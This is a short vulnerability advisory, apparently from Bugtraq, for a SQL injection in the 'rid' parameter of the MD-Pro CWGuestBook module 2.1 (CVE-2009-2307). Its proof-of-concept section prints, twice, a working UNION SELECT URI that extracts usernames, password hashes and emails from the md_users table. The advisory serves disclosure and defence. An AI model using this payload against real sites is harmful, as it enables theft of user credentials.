CWGuestBook Module for MD-Pro 'rid' Parameter SQL Injection Vulnerability
BID:43798
Info
CWGuestBook Module for MD-Pro 'rid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 43798 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-2307 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2009 12:00AM |
| Updated: | Jun 30 2009 12:00AM |
| Credit: | Dante90 |
| Vulnerable: |
MAXdev CWGuestBook 2.1 |
| Not Vulnerable: | |
Exploit / POC
CWGuestBook Module for MD-Pro 'rid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--